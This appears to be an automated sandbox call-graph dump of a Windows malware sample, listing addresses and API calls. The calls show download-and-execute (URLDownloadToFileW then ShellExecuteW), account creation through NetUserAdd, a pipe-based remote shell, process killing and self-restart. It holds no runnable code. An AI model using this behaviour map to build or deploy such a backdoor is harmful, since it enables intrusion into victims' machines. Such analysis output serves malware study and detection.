LeaveCriticalSection 10641->10322 10643 40d328 6 API calls 10642->10643 10644 402770 10643->10644 10645 4033bf 4 API calls 10644->10645 10646 40278e 10645->10646 11704 405c6d 10646->11704 10649 403554 11 API calls 10650 4027a3 10649->10650 11707 40d36c 10650->11707 10652 4027a9 11722 405ea5 VirtualFree 10652->11722 10654 4027b1 10654->10353 11727 40de1f 10655->11727 10658 40e554 10660 40f51d 2 API calls 10658->10660 10659 40e459 10661 4035e5 4 API calls 10659->10661 10662 40e559 10660->10662 10663 40e466 10661->10663 10664 40e6cf 10662->10664 11786 40f4ce LoadLibraryA 10662->11786 11752 41168e 10663->11752 10668 404b91 3 API calls 10664->10668 10671 40e6e3 10668->10671 10669 40e567 10669->10664 10672 40e56f 10669->10672 10670 403437 3 API calls 10673 40e47d 10670->10673 10674 404f2b 15 API calls 10671->10674 10675 40fbfc 4 API calls 10672->10675 11770 405ea5 VirtualFree 10673->11770 10677 40e6eb 10674->10677 10679 40e574 10675->10679 10678 404b6e VirtualFree 10677->10678 10681 40e6f3 LeaveCriticalSection 10678->10681 10682 40e5a4 10679->10682 10683 40e579 10679->10683 10680 40e485 11771 405ea5 VirtualFree 10680->11771 10687 40e6fc 10681->10687 10688 4034a7 21 API calls 10682->10688 10685 404b91 3 API calls 10683->10685 10689 40e58d 10685->10689 10686 40e492 10690 4035e5 4 API calls 10686->10690 10687->10322 10691 40e5af 10688->10691 10692 404f2b 15 API calls 10689->10692 10693 40e49f 10690->10693 10694 403437 3 API calls 10691->10694 10695 40e595 10692->10695 10696 41168e 22 API calls 10693->10696 10697 40e5ba 10694->10697 10698 404b6e VirtualFree 10695->10698 10699 40e4ab 10696->10699 11789 405ea5 VirtualFree 10697->11789 10762 40e52a 10698->10762 10701 403437 3 API calls 10699->10701 10704 40e4b8 10701->10704 10702 40e5c2 10705 4034a7 21 API calls 10702->10705 10703 40e658 LeaveCriticalSection 10703->10687 11772 405ea5 VirtualFree 10704->11772 10707 40e5cd 10705->10707 10709 403437 3 API calls 10707->10709 10708 40e4c0 11773 405ea5 VirtualFree 10708->11773 10710 40e5da 10709->10710 11790 405ea5 VirtualFree 10710->11790 10713 40e4cb 10715 403261 lstrlenW 10713->10715 10714 40e5e2 RegCreateKeyExA RegSetValueExW RegCloseKey 11791 40d418 NetUserAdd 10714->11791 10717 40e4d5 10715->10717 10719 40e52c 10717->10719 10723 403261 lstrlenW 10717->10723 10720 404b91 3 API calls 10719->10720 10724 40e53c 10720->10724 10721 40e638 10725 404b91 3 API calls 10721->10725 10722 40e66b 10726 4035e5 4 API calls 10722->10726 10727 40e4e0 10723->10727 10729 404f2b 15 API calls 10724->10729 10730 40e648 10725->10730 10731 40e67d 10726->10731 10727->10719 10728 40e4e4 10727->10728 10732 4035e5 4 API calls 10728->10732 10733 40e544 10729->10733 10734 404f2b 15 API calls 10730->10734 11797 41165b 10731->11797 10737 40e4f2 10732->10737 10738 404b6e VirtualFree 10733->10738 10739 40e650 10734->10739 10741 4035e5 4 API calls 10737->10741 10738->10762 10742 404b6e VirtualFree 10739->10742 10744 40e4fc 10741->10744 10742->10703 10743 40e690 10745 4035e5 4 API calls 10743->10745 11774 404b91 10744->11774 10747 40e69e 10745->10747 10749 41165b 8 API calls 10747->10749 10751 40e6a6 10749->10751 10750 404f2b 15 API calls 10752 40e50f 10750->10752 11806 405ea5 VirtualFree 10751->11806 11779 404b6e 10752->11779 10755 40e6ae 11807 401f4b CreateThread 10755->11807 10759 40e6c3 LeaveCriticalSection 10759->10687 10760 40e51f 11785 405ea5 VirtualFree 10760->11785 10762->10703 10764 4098da 10763->10764 10765 4098ff LeaveCriticalSection 10763->10765 10766 401f76 2 API calls 10764->10766 10765->10322 10767 4098e4 10766->10767 11827 401f4b CreateThread 10767->11827 10770 409965 10769->10770 10771 40997c 10769->10771 11828 401f4b CreateThread 10770->11828 10773 401f76 2 API calls 10771->10773 10775 409981 10773->10775 10774 409970 10776 40999b LeaveCriticalSection 10774->10776 11829 401f4b CreateThread 10775->11829 10776->10322 10779 40f76b 5 API calls 10778->10779 10780 4027e9 10779->10780 10781 4034a7 21 API calls 10780->10781 10782 4027f4 10781->10782 10783 40346a 9 API calls 10782->10783 10784 402803 10783->10784 10785 403335 5 API calls 10784->10785 10786 40280b 10785->10786 11830 405ea5 VirtualFree 10786->11830 10788 402813 10789 40362d 3 API calls 10788->10789 10790 402822 10789->10790 11831 40351d 10790->11831 10793 403335 5 API calls 10794 402837 10793->10794 11836 405ea5 VirtualFree 10794->11836 10796 40283f 11837 405ea5 VirtualFree 10796->11837 10798 40284b 10799 40362d 3 API calls 10798->10799 10800 402857 URLDownloadToFileW 10799->10800 11838 405ea5 VirtualFree 10800->11838 10802 402870 10803 402874 10802->10803 10804 40287d ShellExecuteW 10802->10804 10805 404f2b 15 API calls 10803->10805 10804->10803 10806 4028b1 10805->10806 11839 405ea5 VirtualFree 10806->11839 10808 4028b9 10808->10310 10810 405c6d 3 API calls 10809->10810 10811 4026e4 10810->10811 10812 403554 11 API calls 10811->10812 10813 4026eb 10812->10813 11840 405ea5 VirtualFree 10813->11840 10815 4026f3 inet_addr 10816 402701 getaddrinfo 10815->10816 10817 402739 10815->10817 10816->10817 11841 413de9 10817->11841 10821 40274a 10821->10335 10823 40362d 3 API calls 10822->10823 10824 402b99 10823->10824 10825 40ff27 17 API calls 10824->10825 10826 402ba1 10825->10826 10827 401361 12 API calls 10826->10827 10828 402baf 10827->10828 10829 40362d 3 API calls 10828->10829 10830 402bb8 10829->10830 11849 403bbb 10830->11849 10833 404f2b 15 API calls 10834 402bcb 10833->10834 11860 403b8b 10834->11860 10837 402be0 10837->10322 10838 401ad5 VirtualFree 10838->10837 10840 40304c 2 API calls 10839->10840 10841 4025e9 10840->10841 11874 411e8c VirtualAlloc 10841->11874 10843 4025f6 10844 402612 10843->10844 10845 402619 10843->10845 11877 407af1 10844->11877 11896 4079e8 10845->11896 10848 40261e VirtualFree 10850 403036 2 API calls 10848->10850 10851 402634 10850->10851 10851->10322 10853 404f2b 15 API calls 10852->10853 10854 40264e 10853->10854 10854->10322 10856 402683 10855->10856 10857 40265c 10855->10857 10856->10322 10858 40362d 3 API calls 10857->10858 10859 402668 ShellExecuteW 10858->10859 11981 405ea5 VirtualFree 10859->11981 10862 405c6d 3 API calls 10861->10862 10863 4026a1 10862->10863 10864 403554 11 API calls 10863->10864 10865 4026a8 10864->10865 11982 40ee22 10865->11982 10869 4026b8 11986 405ea5 VirtualFree 10869->11986 10871 4026c0 10871->10316 10873 404f2b 15 API calls 10872->10873 10874 402981 10873->10874 12068 4132ed 10874->12068 10878 41171c 10877->10878 12072 410f31 RegDeleteKeyW 10878->12072 10880 411732 10881 411746 10880->10881 10882 411739 TerminateThread 10880->10882 10883 411788 10881->10883 10884 41106c 5 API calls 10881->10884 10882->10881 10885 411794 GetModuleFileNameA 10883->10885 10886 411762 10884->10886 10894 4117c6 10885->10894 10887 40362d 3 API calls 10886->10887 10888 41176e 10887->10888 12073 410f4c 10888->12073 10892 411781 10893 410fae RegCloseKey 10892->10893 10893->10883 10895 41181a CreateProcessA CloseHandle CloseHandle ExitProcess 10894->10895 10935 401875 10896->10935 10899 410004 10900 401361 12 API calls 10899->10900 10901 41000f 10900->10901 10903 41001c 10901->10903 10904 401ad5 VirtualFree 10901->10904 10902 4035e5 4 API calls 10911 40ff64 10902->10911 10952 405ea5 VirtualFree 10903->10952 10904->10903 10906 403437 3 API calls 10906->10911 10907 402c11 10914 401361 10907->10914 10909 40362d 3 API calls 10909->10911 10911->10899 10911->10902 10911->10906 10911->10909 10938 405ea5 VirtualFree 10911->10938 10939 401776 10911->10939 10951 405ea5 VirtualFree 10911->10951 10913 40ffee FindNextFileW 10913->10911 10915 401875 2 API calls 10914->10915 10916 40137c 10915->10916 10917 40139f 10916->10917 10919 401776 6 API calls 10916->10919 10956 4018c2 10916->10956 10920 404450 10917->10920 10919->10916 10921 401361 12 API calls 10920->10921 10922 404468 10921->10922 10923 402c27 10922->10923 10924 401ad5 VirtualFree 10922->10924 10925 404f2b 10923->10925 10924->10923 10926 404f40 10925->10926 10961 4055a5 10926->10961 10929 403036 2 API calls 10930 402c2f 10929->10930 10931 40442d 10930->10931 10932 402c37 10931->10932 10933 40443d 10931->10933 10932->10405 10932->10406 10934 401ad5 VirtualFree 10933->10934 10934->10932 10953 405f53 GetProcessHeap HeapAlloc 10935->10953 10937 40189e FindFirstFileW 10937->10911 10938->10911 10940 40178d 10939->10940 10941 401837 10939->10941 10954 405f53 GetProcessHeap HeapAlloc 10940->10954 10943 403437 3 API calls 10941->10943 10944 401851 10943->10944 10955 405ea5 VirtualFree 10944->10955 10946 4017b6 10949 403437 3 API calls 10946->10949 10950 401825 10946->10950 10947 40186e 10947->10911 10948 401ad5 VirtualFree 10948->10941 10949->10946 10950->10941 10950->10948 10951->10913 10952->10907 10953->10937 10954->10946 10955->10947 10957 405ca3 3 API calls 10956->10957 10958 4018d8 10957->10958 10959 40362d 3 API calls 10958->10959 10960 4018e8 10959->10960 10960->10916 10962 404f49 10961->10962 10963 4055ba 10961->10963 10962->10929 10964 4033bf 4 API calls 10963->10964 10965 4055c7 10964->10965 10966 403003 7 API calls 10965->10966 10967 4055d0 10966->10967 10979 405ea5 VirtualFree 10967->10979 10969 4055d8 10970 40304c 2 API calls 10969->10970 10971 4055e5 10970->10971 10972 40304c 2 API calls 10971->10972 10973 4055f2 10972->10973 10974 4060aa 4 API calls 10973->10974 10975 4055fa send 10974->10975 10976 403036 2 API calls 10975->10976 10977 40561e 10976->10977 10978 403036 2 API calls 10977->10978 10978->10962 10979->10969 11021 405f53 GetProcessHeap HeapAlloc 10980->11021 10982 410043 11022 4019f6 10982->11022 10985 410070 11025 405f53 GetProcessHeap HeapAlloc 10985->11025 10987 410083 GetLogicalDriveStringsW 10993 41008d 10987->10993 10988 4035e5 4 API calls 10988->10993 10989 4013a8 12 API calls 10990 410111 10989->10990 10992 41011e 10990->10992 10994 401b00 VirtualFree 10990->10994 10991 403437 3 API calls 10991->10993 10992->10409 10993->10988 10993->10991 10999 403261 lstrlenW 10993->10999 11001 410103 10993->11001 11026 405ea5 VirtualFree 10993->11026 11027 401903 10993->11027 11039 405ea5 VirtualFree 10993->11039 10994->10992 10996 4100b1 GetDriveTypeW 10997 40362d 3 API calls 10996->10997 10997->10993 10999->10993 11001->10989 11003 4019f6 2 API calls 11002->11003 11004 4013c3 11003->11004 11005 4013e6 11004->11005 11007 401903 6 API calls 11004->11007 11043 401a43 11004->11043 11008 40453e 11005->11008 11007->11004 11009 4013a8 12 API calls 11008->11009 11011 404556 11009->11011 11010 402c6e 11010->10414 11011->11010 11012 401b00 VirtualFree 11011->11012 11012->11010 11014 402c7e 11013->11014 11015 40452b 11013->11015 11014->10418 11017 401b00 11014->11017 11016 401b00 VirtualFree 11015->11016 11016->11014 11018 401b23 11017->11018 11020 401b11 11017->11020 11018->10418 11020->11018 11048 405ea5 VirtualFree 11020->11048 11021->10982 11040 405f53 GetProcessHeap HeapAlloc 11022->11040 11024 401a1f GetLogicalDriveStringsW 11024->10985 11024->10993 11025->10987 11026->10996 11028 4019be 11027->11028 11029 40191a 11027->11029 11031 403437 3 API calls 11028->11031 11041 405f53 GetProcessHeap HeapAlloc 11029->11041 11032 4019d8 11031->11032 11042 405ea5 VirtualFree 11032->11042 11034 401943 11036 403437 3 API calls 11034->11036 11038 4019ac 11034->11038 11035 4019ef 11035->10993 11036->11034 11037 401b00 VirtualFree 11037->11028 11038->11028 11038->11037 11039->10993 11040->11024 11041->11034 11042->11035 11044 405ca3 3 API calls 11043->11044 11045 401a59 11044->11045 11046 40362d 3 API calls 11045->11046 11047 401a69 11046->11047 11047->11004 11048->11020 11050 410d46 11049->11050 11097 4016e3 11050->11097 11052 410d67 CreateToolhelp32Snapshot 11053 410d7b Process32FirstW 11052->11053 11054 410efd 11052->11054 11055 410d8d CloseHandle 11053->11055 11056 410dce 11053->11056 11057 40131a 12 API calls 11054->11057 11059 40131a 12 API calls 11055->11059 11060 4032ff 9 API calls 11056->11060 11058 410f08 11057->11058 11061 410dc9 11058->11061 11064 401416 VirtualFree 11058->11064 11062 410d9f 11059->11062 11063 410dec OpenProcess 11060->11063 11061->10422 11062->11061 11065 401416 VirtualFree 11062->11065 11072 410e09 11063->11072 11064->11058 11065->11062 11066 410e1c GetModuleFileNameExW 11066->11072 11067 4035e5 lstrlenW lstrlenW lstrcpyW VirtualAlloc 11067->11072 11068 405ea5 VirtualFree 11068->11072 11069 403437 lstrlenW lstrcpyW VirtualAlloc 11069->11072 11070 410e80 CloseHandle 11070->11072 11071 40362d lstrlenW lstrcpyW VirtualAlloc 11071->11072 11072->11066 11072->11067 11072->11068 11072->11069 11072->11070 11072->11071 11074 401416 VirtualFree 11072->11074 11100 4015c0 11072->11100 11075 410edd Process32NextW 11074->11075 11075->11056 11076 410ef6 CloseHandle 11075->11076 11076->11054 11078 4016e3 2 API calls 11077->11078 11080 401335 11078->11080 11079 401358 11083 404660 11079->11083 11080->11079 11082 4015c0 6 API calls 11080->11082 11116 401735 11080->11116 11082->11080 11084 40131a 12 API calls 11083->11084 11087 404678 11084->11087 11085 402cb6 11085->10427 11086 401416 VirtualFree 11086->11087 11087->11085 11087->11086 11089 404651 11088->11089 11090 404634 11088->11090 11089->10432 11090->11089 11091 401416 VirtualFree 11090->11091 11091->11090 11123 405ea5 VirtualFree 11092->11123 11094 401421 11124 405ea5 VirtualFree 11094->11124 11096 40142d 11096->10432 11114 405f53 GetProcessHeap HeapAlloc 11097->11114 11099 40170c 11099->11052 11099->11099 11101 4015d7 11100->11101 11113 40169c 11100->11113 11115 405f53 GetProcessHeap HeapAlloc 11101->11115 11103 403437 3 API calls 11104 4016c3 11103->11104 11105 403437 3 API calls 11104->11105 11106 4016d1 11105->11106 11108 401416 VirtualFree 11106->11108 11107 401600 11109 403437 lstrlenW lstrcpyW VirtualAlloc 11107->11109 11111 401676 11107->11111 11110 4016dc 11108->11110 11109->11107 11110->11072 11112 401416 VirtualFree 11111->11112 11111->11113 11112->11111 11113->11103 11114->11099 11115->11107 11117 405ca3 3 API calls 11116->11117 11118 40174a 11117->11118 11119 40362d 3 API calls 11118->11119 11120 401762 11119->11120 11121 40362d 3 API calls 11120->11121 11122 40176e 11121->11122 11122->11080 11123->11094 11124->11096 11126 40f97d 11125->11126 11207 401085 GetProcessHeap RtlAllocateHeap 11126->11207 11128 40f9e4 11129 4033bf 4 API calls 11128->11129 11130 40fa02 11129->11130 11131 40309d 10 API calls 11130->11131 11132 40fa09 11131->11132 11208 405ea5 VirtualFree 11132->11208 11134 40fa11 11209 401099 GetProcessHeap HeapFree 11134->11209 11136 402d04 11137 40f80e CoInitializeSecurity CoInitialize 11136->11137 11138 40f836 CoCreateInstance 11137->11138 11140 40f877 11137->11140 11138->11140 11141 40f854 11138->11141 11139 4035e5 4 API calls 11143 402d0c GetModuleFileNameA 11139->11143 11140->11139 11141->11140 11142 40f8ca VariantInit 11141->11142 11141->11143 11142->11141 11143->10438 11144->10445 11146 4035e5 4 API calls 11145->11146 11147 402d7f 11146->11147 11147->10450 11149 40fa64 GetProcAddress 11148->11149 11150 402d90 11148->11150 11149->11150 11151 40fcb8 11150->11151 11152 40fcde 11151->11152 11175 40fd58 11151->11175 11153 4035e5 4 API calls 11152->11153 11154 40fceb RegOpenKeyExW 11153->11154 11210 405ea5 VirtualFree 11154->11210 11155 402e93 2 API calls 11157 40fd6c 11155->11157 11159 403036 2 API calls 11157->11159 11158 40fd0e 11160 40fd3d 11158->11160 11163 4035e5 4 API calls 11158->11163 11161 40fd74 11159->11161 11212 40607a 11160->11212 11164 410fae RegCloseKey 11161->11164 11167 40fd24 11163->11167 11165 402d9f 11164->11165 11177 404241 11165->11177 11169 410fc3 12 API calls 11167->11169 11168 402e93 2 API calls 11170 40fd50 11168->11170 11171 40fd2d 11169->11171 11172 403036 2 API calls 11170->11172 11211 405ea5 VirtualFree 11171->11211 11172->11175 11174 40fd35 11176 410fae RegCloseKey 11174->11176 11175->11155 11176->11160 11178 40304c 2 API calls 11177->11178 11179 404259 11178->11179 11180 40362d 3 API calls 11179->11180 11181 40427d 11180->11181 11182 40362d 3 API calls 11181->11182 11183 404289 11182->11183 11184 40362d 3 API calls 11183->11184 11185 4042a1 11184->11185 11186 40362d 3 API calls 11185->11186 11187 4042ad 11186->11187 11188 403036 2 API calls 11187->11188 11189 4042b5 11188->11189 11216 405ea5 VirtualFree 11189->11216 11191 4042bd 11217 405ea5 VirtualFree 11191->11217 11193 4042c9 11218 405ea5 VirtualFree 11193->11218 11195 4042d5 11219 405ea5 VirtualFree 11195->11219 11207->11128 11208->11134 11209->11136 11210->11158 11211->11174 11213 406097 11212->11213 11214 402f91 6 API calls 11213->11214 11215 4060a5 11214->11215 11215->11168 11216->11191 11217->11193 11218->11195 11225 4012c9 11224->11225 11226 4012b6 11224->11226 11230 4076c0 11225->11230 11251 405f53 GetProcessHeap HeapAlloc 11226->11251 11228 4012be 11228->11225 11252 4077ae 11228->11252 11259 401085 GetProcessHeap RtlAllocateHeap 11230->11259 11232 4076d7 11233 403437 3 API calls 11232->11233 11234 4076fb 11233->11234 11260 401085 GetProcessHeap RtlAllocateHeap 11234->11260 11236 407719 11237 40362d 3 API calls 11236->11237 11238 407725 11237->11238 11239 40362d 3 API calls 11238->11239 11240 40772e 11239->11240 11241 403261 lstrlenW 11240->11241 11242 407736 11241->11242 11261 405ea5 VirtualFree 11242->11261 11244 407752 11262 405ea5 VirtualFree 11244->11262 11246 40775a 11263 41026f WaitForSingleObject 11246->11263 11248 407774 CreateThread 11264 401e9c 11248->11264 11269 4073bb 11248->11269 11251->11228 11257 405f53 GetProcessHeap HeapAlloc 11252->11257 11254 4077c9 11258 410298 CreateMutexA 11254->11258 11256 4077dd 11256->11225 11257->11254 11258->11256 11259->11232 11260->11236 11261->11244 11262->11246 11263->11248 11265 401eb0 11264->11265 11267 401edc ReleaseMutex 11264->11267 11268 405f53 GetProcessHeap HeapAlloc 11265->11268 11267->10477 11268->11267 11270 4035e5 4 API calls 11269->11270 11271 4073e0 11270->11271 11303 4078b0 11271->11303 11274 4074e3 PathFindFileNameW 11275 4035e5 4 API calls 11274->11275 11277 407510 11275->11277 11276 407549 11335 407574 11276->11335 11327 4040ea 11277->11327 11280 410125 CloseHandle 11280->11276 11283 407557 11357 4077e3 11283->11357 11284 404f2b 15 API calls 11289 407525 11284->11289 11285 407476 PathFindFileNameW 11288 4035e5 4 API calls 11285->11288 11286 407426 PathFindFileNameW 11290 4035e5 4 API calls 11286->11290 11301 4073f3 11288->11301 11332 404050 11289->11332 11290->11301 11292 403036 2 API calls 11294 407569 11292->11294 11295 4040ea lstrlenW lstrcpyW VirtualFree VirtualAlloc 11295->11301 11297 403036 2 API calls 11302 4074e1 11297->11302 11298 404f2b 15 API calls 11298->11301 11299 404050 VirtualFree 11299->11301 11300 403036 GetProcessHeap HeapFree 11300->11301 11301->11285 11301->11286 11301->11295 11301->11298 11301->11299 11301->11300 11301->11302 11314 40783b 11301->11314 11302->11276 11302->11280 11365 405f53 GetProcessHeap HeapAlloc 11303->11365 11305 4078ce 11306 40fece CreateMutexA 11305->11306 11307 4078f5 11306->11307 11308 403437 3 API calls 11307->11308 11309 407909 11308->11309 11310 410192 2 API calls 11309->11310 11311 407917 11310->11311 11366 405ea5 VirtualFree 11311->11366 11313 4073e9 11313->11274 11313->11301 11315 407846 11314->11315 11320 407893 11314->11320 11316 407862 11315->11316 11317 40789a 11315->11317 11315->11320 11367 40fe3d 11316->11367 11318 40fe3d 12 API calls 11317->11318 11318->11320 11320->11301 11323 40787b 11324 402f91 6 API calls 11323->11324 11325 40788d 11324->11325 11380 401099 GetProcessHeap HeapFree 11325->11380 11328 40362d 3 API calls 11327->11328 11329 404108 11328->11329 11384 405ea5 VirtualFree 11329->11384 11331 404134 11331->11284 11385 405ea5 VirtualFree 11332->11385 11334 404061 11334->11297 11386 41026f WaitForSingleObject 11335->11386 11337 4075d8 11338 4075da ReleaseMutex 11337->11338 11338->11283 11339 405ca3 3 API calls 11340 40758f 11339->11340 11340->11337 11340->11339 11341 4075ee 11340->11341 11342 405ca3 3 API calls 11341->11342 11343 4075f8 11342->11343 11387 405ea5 VirtualFree 11343->11387 11345 407610 11346 405ca3 3 API calls 11345->11346 11347 407621 TerminateThread 11346->11347 11348 405ca3 3 API calls 11347->11348 11349 40764d 11348->11349 11349->11338 11350 4040ea 4 API calls 11349->11350 11351 4076a2 11350->11351 11352 404f2b 15 API calls 11351->11352 11353 4076ab 11352->11353 11354 404050 VirtualFree 11353->11354 11355 4076b3 11354->11355 11356 403036 2 API calls 11355->11356 11356->11337 11358 4077f4 11357->11358 11359 4077ec 11357->11359 11361 40feed 4 API calls 11358->11361 11360 410125 CloseHandle 11359->11360 11360->11358 11362 4077fc 11361->11362 11363 407560 11362->11363 11364 403036 2 API calls 11362->11364 11363->11292 11364->11362 11365->11305 11366->11313 11368 40fe53 11367->11368 11369 40fe4b 11367->11369 11382 405eff GetProcessHeap RtlAllocateHeap 11368->11382 11381 41026f WaitForSingleObject 11369->11381 11372 40fe5f SetFilePointer ReadFile 11373 402f91 6 API calls 11372->11373 11374 40fe8f 11373->11374 11383 405eee GetProcessHeap HeapFree 11374->11383 11376 40fe96 11377 40786d 11376->11377 11378 40fe9c ReleaseMutex 11376->11378 11379 401085 GetProcessHeap RtlAllocateHeap 11377->11379 11378->11377 11379->11323 11380->11320 11381->11368 11382->11372 11383->11376 11384->11331 11385->11334 11386->11340 11387->11345 11388->10482 11389->10484 11391 40f76b 5 API calls 11390->11391 11392 40edcb 11391->11392 11393 40346a 9 API calls 11392->11393 11394 40edd8 11393->11394 11395 40362d 3 API calls 11394->11395 11396 40ede4 11395->11396 11435 40eafb 11396->11435 11398 40ede9 11472 405ea5 VirtualFree 11398->11472 11400 40edfb 11400->10499 11401->10491 11402->10493 11404 40ead4 11403->11404 11405 40ea95 GetCurrentThreadId 11403->11405 11406 40ec8c CloseHandle 11404->11406 11407 40eaa0 11405->11407 11408 40eacd 11405->11408 11409 40eadc 11406->11409 11410 40eaa6 SetEvent WaitForSingleObject 11407->11410 11418 40eaf4 11407->11418 11411 40ec8c CloseHandle 11408->11411 11412 40ec8c CloseHandle 11409->11412 11410->11408 11413 40eac3 TerminateThread 11410->11413 11411->11404 11414 40eae4 11412->11414 11413->11408 11415 40ec8c CloseHandle 11414->11415 11416 40eaec 11415->11416 11417 40ec8c CloseHandle 11416->11417 11417->11418 11418->10499 11420 402a97 11419->11420 11421 403407 11419->11421 11426 40ecd0 11420->11426 11422 403372 lstrlenA 11421->11422 11423 40340e 11422->11423 11520 405eb4 VirtualAlloc 11423->11520 11425 403415 lstrcpyA 11425->11420 11427 40ece2 11426->11427 11428 40ecde 11426->11428 11521 40315f 11427->11521 11528 405ea5 VirtualFree 11428->11528 11432 40ed18 11432->10499 11433 40308c lstrlenA 11434 40ed00 WriteFile 11433->11434 11434->11428 11436 40ea89 5 API calls 11435->11436 11437 40eb0e CreatePipe 11436->11437 11438 40ec47 11437->11438 11439 40eb4f GetCurrentProcess GetCurrentProcess DuplicateHandle 11437->11439 11441 40ec8c CloseHandle 11438->11441 11439->11438 11440 40eb77 CreatePipe 11439->11440 11440->11438 11442 40eb93 GetCurrentProcess GetCurrentProcess DuplicateHandle 11440->11442 11443 40ec4f 11441->11443 11442->11438 11444 40ebb1 GetCurrentProcess GetCurrentProcess DuplicateHandle 11442->11444 11445 40ec8c CloseHandle 11443->11445 11444->11438 11446 40ebcb 11444->11446 11447 40ec57 11445->11447 11473 40ec8c 11446->11473 11449 40ec8c CloseHandle 11447->11449 11450 40ec5f 11449->11450 11452 40ec8c CloseHandle 11450->11452 11454 40ec67 11452->11454 11453 40ec8c CloseHandle 11455 40ebdb 11453->11455 11456 40ec8c CloseHandle 11454->11456 11457 40362d 3 API calls 11455->11457 11459 40ec6f 11456->11459 11458 40ebf0 11457->11458 11476 40e891 11458->11476 11461 40ea89 5 API calls 11459->11461 11463 40ec79 11461->11463 11482 405ea5 VirtualFree 11463->11482 11464 40ec8c CloseHandle 11466 40ec01 11464->11466 11468 40ec8c CloseHandle 11466->11468 11467 40ec83 11467->11398 11469 40ec09 11468->11469 11470 40ec8c CloseHandle 11469->11470 11471 40ec11 CreateEventA CreateThread 11470->11471 11471->11438 11471->11463 11484 40e92a 11471->11484 11472->11400 11474 40ec94 CloseHandle 11473->11474 11475 40ebd3 11473->11475 11474->11475 11475->11453 11477 401052 11476->11477 11478 40e8a6 CreateProcessW 11477->11478 11479 40e8ed 11478->11479 11483 405ea5 VirtualFree 11479->11483 11481 40e8fe 11481->11438 11481->11464 11482->11467 11483->11481 11485 40e95d 11484->11485 11487 40e947 WaitForMultipleObjects 11485->11487 11492 40e96f 11485->11492 11493 40e996 11485->11493 11487->11485 11488 40e976 11487->11488 11489 40e996 25 API calls 11488->11489 11489->11492 11490 40ea89 5 API calls 11491 40e98c 11490->11491 11492->11490 11494 40ea49 PeekNamedPipe 11493->11494 11495 40e9a5 11494->11495 11496 40ea67 GetLastError 11494->11496 11497 40ea72 11495->11497 11509 401085 GetProcessHeap RtlAllocateHeap 11495->11509 11496->11497 11497->11485 11499 40e9b7 ReadFile 11499->11496 11507 40e9d9 11499->11507 11500 402f91 6 API calls 11500->11507 11502 402ecf 8 API calls 11502->11507 11504 40308c lstrlenA 11504->11507 11505 4033f5 3 API calls 11505->11507 11506 405ea5 VirtualFree 11506->11507 11507->11500 11507->11502 11507->11504 11507->11505 11507->11506 11508 403036 2 API calls 11507->11508 11510 401099 GetProcessHeap HeapFree 11507->11510 11511 402f22 11507->11511 11508->11494 11509->11499 11510->11507 11518 401085 GetProcessHeap RtlAllocateHeap 11511->11518 11513 402f33 11514 4033bf 4 API calls 11513->11514 11516 402f59 11514->11516 11515 402f63 11515->11507 11516->11515 11519 401099 GetProcessHeap HeapFree 11516->11519 11518->11513 11519->11515 11520->11425 11522 4033bf 4 API calls 11521->11522 11523 403173 11522->11523 11529 40318a 11523->11529 11525 40317b 11536 405ea5 VirtualFree 11525->11536 11527 403183 11527->11433 11528->11432 11530 40308c lstrlenA 11529->11530 11531 40319c 11530->11531 11532 40308c lstrlenA 11531->11532 11533 4031a5 11532->11533 11534 405e46 3 API calls 11533->11534 11535 4031b1 lstrcatA 11534->11535 11535->11525 11536->11527 11538 410d20 11537->11538 11539 410d08 TerminateProcess CloseHandle 11537->11539 11538->10503 11539->10503 11541 410ca4 Process32FirstW 11540->11541 11547 410cd5 11540->11547 11542 410cb4 11541->11542 11543 410cce CloseHandle 11542->11543 11544 410cbc Process32NextW 11542->11544 11545 410cdf CloseHandle 11542->11545 11543->11547 11544->11542 11546 4035e5 4 API calls 11545->11546 11546->11547 11547->10509 11549 40362d 3 API calls 11548->11549 11550 404364 11549->11550 11556 405ea5 VirtualFree 11550->11556 11552 402ae1 11552->10512 11557 405ea5 VirtualFree 11553->11557 11555 402af1 11555->10322 11556->11552 11557->11555 11578 405ea5 VirtualFree 11558->11578 11560 40ff22 11560->10520 11562 40362d 3 API calls 11561->11562 11563 4039cd 11562->11563 11579 405ea5 VirtualFree 11563->11579 11565 402b3f 11566 405ea5 VirtualFree 11565->11566 11566->10537 11580 405ea5 VirtualFree 11567->11580 11569 4039af 11569->10523 11571 40362d 3 API calls 11570->11571 11572 403fe9 11571->11572 11581 405ea5 VirtualFree 11572->11581 11574 402b6b 11574->10534 11582 405ea5 VirtualFree 11575->11582 11577 402b7b 11577->10322 11578->11560 11579->11565 11580->11569 11581->11574 11582->11577 11593 410298 CreateMutexA 11583->11593 11585 410217 11586 403437 3 API calls 11585->11586 11587 410223 11586->11587 11594 405ea5 VirtualFree 11587->11594 11589 4028ef 11589->10575 11590->10578 11592 4101f4 11591->11592 11592->10583 11593->11585 11594->11589 11595->10599 11596->10605 11597->10609 11599 412d42 11598->11599 11611 412e94 11598->11611 11600 412d71 11599->11600 11601 412a6b 4 API calls 11599->11601 11599->11611 11602 412d7a CoCreateInstance 11600->11602 11600->11611 11601->11600 11603 412d9c 11602->11603 11602->11611 11604 4124eb CoTaskMemFree 11603->11604 11603->11611 11605 412e5e 11604->11605 11606 412b2a 3 API calls 11605->11606 11607 412e72 11606->11607 11608 405ca3 3 API calls 11607->11608 11609 412e7d 11608->11609 11612 4125d8 11609->11612 11611->10606 11613 412f63 VirtualFree 11612->11613 11614 4125f0 11613->11614 11614->11611 11651 401534 11615->11651 11618 41227b 11655 412c3f 11618->11655 11621 41226f 11621->11618 11623 412ed4 20 API calls 11621->11623 11622 4029c5 11632 4012d3 11622->11632 11623->11618 11624 41228f 11624->11622 11625 4033bf 4 API calls 11624->11625 11626 40309d 10 API calls 11624->11626 11627 403437 3 API calls 11624->11627 11628 405ca3 LoadLibraryA GetProcAddress ExitProcess 11624->11628 11629 40362d 3 API calls 11624->11629 11631 405ea5 VirtualFree 11624->11631 11661 401433 11624->11661 11625->11624 11626->11624 11627->11624 11628->11624 11629->11624 11631->11624 11633 401534 2 API calls 11632->11633 11636 4012ee 11633->11636 11634 401311 11638 4047be 11634->11638 11636->11634 11637 401433 6 API calls 11636->11637 11677 401581 11636->11677 11637->11636 11639 4012d3 12 API calls 11638->11639 11640 4047d6 11639->11640 11641 4029db 11640->11641 11642 401aa8 VirtualFree 11640->11642 11641->10619 11642->11641 11644 4029eb 11643->11644 11645 4047ab 11643->11645 11644->10623 11647 401aa8 11644->11647 11646 401aa8 VirtualFree 11645->11646 11646->11644 11648 401abb 11647->11648 11649 401acd 11647->11649 11648->11649 11682 405ea5 VirtualFree 11648->11682 11649->10623 11673 405f53 GetProcessHeap 